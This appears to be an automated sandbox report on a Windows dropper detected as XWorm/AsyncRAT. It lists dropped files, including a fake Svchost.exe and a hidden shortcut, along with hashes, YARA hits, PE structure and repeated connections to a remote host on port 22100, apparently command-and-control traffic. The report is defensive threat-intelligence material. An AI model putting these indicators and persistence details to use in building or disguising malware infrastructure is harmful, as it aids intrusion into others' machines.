                                                                                                                                                                              SHA1:F0197D2DA76F563373686DD104305D1EEB21EC7C
                                                                                                                                                                              SHA-256:3D07268C23490174416EF5A8061E318B5B8B820CB89B27803996085C3B3EE927
                                                                                                                                                                              SHA-512:72593F450A183A53C81A70F9C23AB0EBA4CE46C64C3713F64A6606A3F3344305DFBE3D747FDE2C5353BCB6463EEEFC9B3B0B29395FEB9D71BC540A8D451A72AF
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: ditekSHen
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 82%
• Antivirus: Virustotal, Detection: 77%
                                                                                                                                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1907200
                                                                                                                                                                              Entropy (8bit):5.216055990815914
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:+tjkC9sS0W1PJY7BaSjwI1nTmtO2WC780/TaSX88:w0MSNnWXWC71TaSX
                                                                                                                                                                              MD5:C0E5B07CBF2D02C54F39CE6AAD676DC7
                                                                                                                                                                              SHA1:4100B839D867B252FFA991F91FB9E403B8E41256
                                                                                                                                                                              SHA-256:0198B7C285A13C98123BBCF85D1B072BCC00F225F6D30867F4AB3BE1EA927DA8
                                                                                                                                                                              SHA-512:7E87CA707772BCFD2121F350A001C36A5EDA420E39F4612EF2D36F0B00734837BF5435421A1F005BF88CE4C6F83C79F10C46E8F7D9A793B9F970F88B8A64D87F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 11%
• Antivirus: Virustotal, Detection: 10%
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\X.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Feb 6 07:33:24 2024, mtime=Tue Feb 6 07:33:24 2024, atime=Tue Feb 6 07:33:24 2024, length=36864, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1051
                                                                                                                                                                              Entropy (8bit):4.959171533602536
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:8njC+4optCh/0eda1/obRacgKE/nEjAOqwZk1ngUNwuLxES4t2YZ/elFlSJmkmV:8njc2RmbRXgKwQAOqwZk17REOqygm
                                                                                                                                                                              MD5:3DBA7D47DE032AA3FDDC671CF50B3CEC
                                                                                                                                                                              SHA1:BF88072E19B1FEDA9B7C73FADCC600550EFE4CF8
                                                                                                                                                                              SHA-256:5BD431EEAD7809DAE1B805CDC868757BDE29DE3951FE1431F2F206CEB94EC2B3
                                                                                                                                                                              SHA-512:5A7091C292AEFB511046132CC894A274DA0846C004EA6A4F80B58870E4BB3FAB20D7C67214BC5C652DA3E5C0841A78F3DE1260D175FF2ACFA2B1224B82107FE9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:L..................F.... .....]&.X....]&.X....]&.X............................:..DG..Yr?.D..U..k0.&...&.......bBDj...lj[..X..i0.&.X......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsGFX)D..........................=...A.p.p.D.a.t.a...B.P.1.....FX&D..Local.<......EWsGFX)D.............................L.o.c.a.l.....N.1.....FX)D..Temp..:......EWsGFX)D.............................T.e.m.p.....b.2.....FX-D .Svchost.exe.H......FX-DFX-D...........................|..S.v.c.h.o.s.t...e.x.e.......[...............-.......Z.............o......C:\Users\user\AppData\Local\Temp\Svchost.exe..(.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.S.v.c.h.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......651689...........hT..CrF.f4... .K.E._c...,...E...hT..CrF.f4... .K.E._c...,...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..
                                                                                                                                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                              Entropy (8bit):5.5767765436987435
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:zDf+ZLVzkPLie7Vs6Ji5YYFg9KDO/hg/l193T:f+PzILv7di/Fg9KDO/Cd1dT
                                                                                                                                                                              MD5:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                              SHA1:F0197D2DA76F563373686DD104305D1EEB21EC7C
                                                                                                                                                                              SHA-256:3D07268C23490174416EF5A8061E318B5B8B820CB89B27803996085C3B3EE927
                                                                                                                                                                              SHA-512:72593F450A183A53C81A70F9C23AB0EBA4CE46C64C3713F64A6606A3F3344305DFBE3D747FDE2C5353BCB6463EEEFC9B3B0B29395FEB9D71BC540A8D451A72AF
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\X.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\X.exe, Author: Joe Security
                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\X.exe, Author: ditekSHen
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 82%
• Antivirus: Virustotal, Detection: 77%
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                              Entropy (8bit):4.393843540338418
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:xl4fiJoH0ncNXiUjt10qTG/gaocYGBoaUMMhA2NX4WABlBuNAMOBSqa:n4vFTMYQUMM6VFYSMU
                                                                                                                                                                              MD5:24DAA3660CF186618750EF08E84EDDF6
                                                                                                                                                                              SHA1:1D5D89CEE862CBACB7091EDF36AF0C8310EA2FAD
                                                                                                                                                                              SHA-256:CFE5E74983F57791C8206AAC4F0709653212123BE80DC2EE86A370B443E57E12
                                                                                                                                                                              SHA-512:4DB24706774D496115FD2965F8598EAF2FB980E22F6B009A37FDA55DA689525A4717F8E4C7F0A4FB404E9EA11115C09F5261ADAA586DC23607B4884BCF0803D1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.287641041986272
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                              File name:SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              File size:2'324'480 bytes
                                                                                                                                                                              MD5:8dcbb40394210dc5287028e66fdbf0c7
                                                                                                                                                                              SHA1:eb367c12ee4e8338a891b563f0b19204197c2ab9
                                                                                                                                                                              SHA256:526a3df9f947f4f372d58e8c0065792ab027f06b49fd4f7c705280b199b541a9
                                                                                                                                                                              SHA512:08877c0da26d59ec1c2f33d7c07c13f88604ead5bd010f067fb6c4892791956efe2b9e350e4797d57e499eb5ca1174e982842abd5c4ece402010b21a1eefb77d
                                                                                                                                                                              SSDEEP:24576:rPUo7mlbJzEEKPZdSj1EmP63dOAAD28Uwm76NNrMQyC5O0uuqc4CJqwTz:2zPKZHmy38D9bE0BqwTz
                                                                                                                                                                              TLSH:AAB59884501A2635C01272F40A1FF2BDD38B5D8169519AACE1B8FC5BF43C697EE38B9D
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D..e................................. ........@.. ........................#...........@................................
                                                                                                                                                                              Icon Hash:134544052b964e2d
                                                                                                                                                                              Entrypoint:0x5de68e
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x65A98144 [Thu Jan 18 19:51:32 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1de640 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1e0000 | 0x5abe4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x23c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1dc694 | 0x1dc800 | eef6402bd13b0e48e2049fa886cca513 | False | 0.6256655585978489 | data | 7.7009507911079 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x1e0000 | 0x5abe4 | 0x5ac00 | e6ea1197538702d40c3777d7d1318ab7 | False | 0.03392411329201102 | data | 1.6048341827288495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x23c000 | 0xc | 0x200 | 924df3d2c0aeebe2aad14bd4a9b1849d | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1e0220 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.24202127659574468
RT_ICON | 0x1e0688 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.13860225140712945
RT_ICON | 0x1e1730 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.09533195020746887
RT_ICON | 0x1e3cd8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | | | 0.07575578649031649
RT_ICON | 0x1e7f00 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | | | 0.04229267715603928
RT_ICON | 0x1f8728 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | | | 0.022150634671716424
RT_GROUP_ICON | 0x23a750 | 0x5a | data | | | 0.7333333333333333
RT_VERSION | 0x23a7ac | 0x24c | data | | | 0.46598639455782315
RT_MANIFEST | 0x23a9f8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                              Feb 6, 2024 09:33:51.806801081 CET4972322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:51.828464031 CET2210049723167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:51.849944115 CET4972322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:51.852504015 CET4972422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:52.010484934 CET2210049723167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:52.053841114 CET2210049723167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:52.058248997 CET2210049724167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:52.058326960 CET4972422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:52.085697889 CET4972422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:52.264373064 CET2210049724167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:52.264653921 CET4972422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:52.291380882 CET2210049724167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:52.470844030 CET2210049724167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:56.586318016 CET4972522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:56.793066978 CET2210049725167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:56.793241024 CET4972522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:56.818622112 CET4972522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:57.000017881 CET2210049725167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:57.000121117 CET4972522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:33:57.025049925 CET2210049725167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:57.206527948 CET2210049725167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:01.214201927 CET4972622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:01.419498920 CET2210049726167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:01.419645071 CET4972622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:01.448504925 CET4972622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:01.626194000 CET2210049726167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:01.626266003 CET4972622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:01.656092882 CET2210049726167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:01.831326008 CET2210049726167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:04.913556099 CET4972722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:05.119144917 CET2210049727167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:05.119272947 CET4972722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:05.146044016 CET4972722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:05.324644089 CET2210049727167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:05.324826002 CET4972722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:05.351175070 CET2210049727167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:05.364998102 CET4972722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:05.366813898 CET4972822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:05.530395031 CET2210049727167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:05.570266962 CET2210049727167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:05.574062109 CET2210049728167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:05.574168921 CET4972822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:05.595226049 CET4972822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:05.781816959 CET2210049728167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:05.781908989 CET4972822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:05.802359104 CET2210049728167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:05.989211082 CET2210049728167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:08.986685038 CET4972922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:09.191935062 CET2210049729167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:09.192156076 CET4972922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:09.213314056 CET4972922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:09.396519899 CET2210049729167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:09.396584034 CET4972922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:09.417037010 CET2210049729167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:09.600328922 CET2210049729167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:12.476496935 CET4973022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:12.687283993 CET2210049730167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:12.687412024 CET4973022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:12.704190016 CET4973022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:12.898231030 CET2210049730167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:12.898431063 CET4973022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:12.914736032 CET2210049730167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:13.108953953 CET2210049730167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:15.023345947 CET4973122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:15.238435984 CET2210049731167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:15.240299940 CET4973122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:15.257075071 CET4973122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:15.455329895 CET2210049731167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:15.455389023 CET4973122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:15.471924067 CET2210049731167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:15.670278072 CET2210049731167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:18.117104053 CET4973322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:18.323419094 CET2210049733167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:18.323550940 CET4973322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:18.340578079 CET4973322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:18.530041933 CET2210049733167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:18.530163050 CET4973322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:18.546732903 CET2210049733167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:18.736923933 CET2210049733167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:20.118175983 CET4973422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:20.323915958 CET2210049734167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:20.324017048 CET4973422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:20.342726946 CET4973422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:20.530050993 CET2210049734167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:20.530150890 CET4973422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:20.548274994 CET2210049734167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:20.735845089 CET2210049734167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:22.509008884 CET4973522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:22.717544079 CET2210049735167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:22.717746019 CET4973522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:22.735097885 CET4973522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:22.926250935 CET2210049735167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:22.926394939 CET4973522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:22.943295956 CET2210049735167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:23.133727074 CET2210049735167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:24.211575031 CET4973622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:24.417798042 CET2210049736167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:24.417892933 CET4973622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:24.438246965 CET4973622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:24.624787092 CET2210049736167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:24.624955893 CET4973622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:24.643923044 CET2210049736167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:24.830559969 CET2210049736167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:26.382632971 CET4973722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:26.598009109 CET2210049737167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:26.598143101 CET4973722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:26.615935087 CET4973722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:26.813570976 CET2210049737167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:26.813640118 CET4973722100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:26.830924988 CET2210049737167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:27.028805971 CET2210049737167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:27.737648964 CET4973822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:27.948808908 CET2210049738167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:27.948965073 CET4973822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:41.235174894 CET2210049757167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:41.248161077 CET2210049757167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:41.430504084 CET2210049758167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:41.430754900 CET4975822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:41.449316025 CET4975822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:41.640283108 CET2210049758167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:41.640360117 CET4975822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:41.646584034 CET4975822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:41.649633884 CET4975922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:41.658427000 CET2210049758167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:41.848685980 CET2210049758167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:41.854819059 CET2210049758167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:41.855052948 CET2210049759167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:41.855148077 CET4975922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:41.895102024 CET4975922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:42.061043978 CET2210049759167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:42.061109066 CET4975922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:42.100480080 CET2210049759167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:42.130786896 CET4975922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:42.133249044 CET4976022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:42.267702103 CET2210049759167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:42.336066008 CET2210049759167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:42.343277931 CET2210049760167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:42.343372107 CET4976022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:42.362333059 CET4976022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:42.552740097 CET2210049760167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:42.552896023 CET4976022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:42.572272062 CET2210049760167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:42.583971977 CET4976022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:42.587225914 CET4976122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:42.762656927 CET2210049760167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:42.790581942 CET2210049761167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:42.790719986 CET4976122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:42.793937922 CET2210049760167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:42.808454037 CET4976122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:34:42.994368076 CET2210049761167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:42.994493961 CET4976122100192.168.2.9167.71.56.116
